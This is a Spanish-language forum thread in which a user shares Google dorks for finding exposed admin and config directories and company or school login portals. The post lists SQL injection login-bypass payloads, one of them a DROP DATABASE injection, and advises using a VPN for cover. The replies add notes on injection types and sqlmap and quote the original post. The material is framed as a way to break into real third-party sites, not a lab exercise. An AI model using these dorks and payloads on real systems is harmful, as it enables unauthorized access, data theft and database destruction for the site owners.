ARCHIVOS DE PAGINAS WEB


uservento

Miembro muy activo
Post rápido sobre esto. Hace tiempo estube en un webinar de hacking ético, y al parecer no era tan ético, jaja.

Te metes a google o cualquier navegador y buscas lo siguiente:

  • index of /admin
  • index of /config
  • index of ws_ftp.log

Es flipante como hay páginas web con estos fallos garrafales. Si es una pàgina web rusa o que esta en ruso, no es metais, nunca os fieis de un ruso en estos temas (experiencia propia).


Si en algunas quereis hacer alguna SQL Injection. Buscais en Google o el buscador que más os guste:
  • login | logon intranet.

Te saldran muchas portales de inicio de sesion de empresesas, colegios, etc. A continuación te dejo "lineas", para hacer SQL Injections:

Para el usuario siempre va bien usar:
- admin
- root
-administrador

Para la contraseña:
- 'union select @@datadir #
- admin' or '1'='1 (este la mayoria de veces me funciona)
- admin'--
- ':SELECT * FROM users WHERE name NOT '
- Pass= '' OR '1'='1') DROP DATABASE (cuidado con usar esta, podrias llegar a borrarle la base de datos, i se va todo a tomar polculo).

Solo deciros que con paginas web de mierda, en la URL añades una ' y ya peta o te devuelve información sobre la Database, que es muy malo que una pagina web responda así ya que te da signos de que es vulnerable.

PORFAVOR. Si lo haceis, al menos en una màquina virtual, si puede ser con una VPN.
 

sedyo

Miembro muy activo
Noder
Ahora Google filtra mucho mas, pero con Dorks como ese en su momento (2015...) sacabas de todo.

Realmente no es necesario que sepas el usuario (aunque cuantos mas detalles sepas mejor).

Si consigues hacer una inyección SQL conseguirás acceso a toda la DB (tablas, columnas y filas).

Las "Lineas" (como tu las llamas), son mejor dicho métodos y en tu caso estas usando métodos basado en union select y clasica, hay algunos métodos mas de inyeccion sql como a ciegas, out-band (remoto) y alguno mas que no recuerdo ahora.

la ultima sentencia no es que "puedas llegar a borrar" es que estas pidiendo con la instrucción DROP DATABASE que borre la DB (si quitas lo de DROP DATABASE no eliminara nada).

Como dice @zuzi.uwu si le metes sqlmap te ahorras el tener que probar. (lo suyo primero es entender como funciona y porque pasa si no, no sabrás arreglar el problema).

Y claro que en un curso de hacking ético te van a enseñar cosas que si las usas a mala fe romperás esa ética, a lo que me refiero la ética depende de la persona y del uso que le da al conocimiento que adquiere.
A un policía se le da una pistola y no por eso van pegándole tiros al primero que le toque los cojones. (quitando USA de la ecuación claro).
 

uservento

Miembro muy activo
Ahora Google filtra mucho mas, pero con Dorks como ese en su momento (2015...) sacabas de todo.

Realmente no es necesario que sepas el usuario (aunque cuantos mas detalles sepas mejor).

Si consigues hacer una inyección SQL conseguirás acceso a toda la DB (tablas, columnas y filas).

Las "Lineas" (como tu las llamas), son mejor dicho métodos y en tu caso estas usando métodos basado en union select y clasica, hay algunos métodos mas de inyeccion sql como a ciegas, out-band (remoto) y alguno mas que no recuerdo ahora.

la ultima sentencia no es que "puedas llegar a borrar" es que estas pidiendo con la instrucción DROP DATABASE que borre la DB (si quitas lo de DROP DATABASE no eliminara nada).

Como dice @zuzi.uwu si le metes sqlmap te ahorras el tener que probar. (lo suyo primero es entender como funciona y porque pasa si no, no sabrás arreglar el problema).

Y claro que en un curso de hacking ético te van a enseñar cosas que si las usas a mala fe romperás esa ética, a lo que me refiero la ética depende de la persona y del uso que le da al conocimiento que adquiere.
A un policía se le da una pistola y no por eso van pegándole tiros al primero que le toque los cojones. (quitando USA de la ecuación claro).
Joder, si que sabes. Seguro que eres mi profe haha
 

Lambda1101

Miembro muy activo
Noder
Post rápido sobre esto. Hace tiempo estube en un webinar de hacking ético, y al parecer no era tan ético, jaja.

Te metes a google o cualquier navegador y buscas lo siguiente:

  • index of /admin
  • index of /******
  • index of ws_ftp.log

Es flipante como hay páginas web con estos fallos garrafales. Si es una pàgina web rusa o que esta en ruso, no es metais, nunca os fieis de un ruso en estos temas (experiencia propia).


Si en algunas quereis hacer alguna SQL Injection. Buscais en Google o el buscador que más os guste:
  • login | logon intranet.

Te saldran muchas portales de inicio de sesion de empresesas, colegios, etc. A continuación te dejo "lineas", para hacer SQL Injections:

Para el usuario siempre va bien usar:
- admin
- root
-administrador

Para la contraseña:
- 'union select @@datadir #
- admin' or '1'='1 (este la mayoria de veces me funciona)
- admin'--
- ':SELECT * FROM users WHERE name NOT '
- Pass= '' OR '1'='1') DROP DATABASE (cuidado con usar esta, podrias llegar a borrarle la *************, i se va todo a tomar polculo).

Solo deciros que con paginas web de mierda, en la URL añades una ' y ya peta o te devuelve información sobre la Database, que es muy malo que una pagina web responda así ya que te da signos de que es vulnerable.

PORFAVOR. Si lo haceis, al menos en una màquina virtual, si puede ser con una VPN.
Hostias pedrin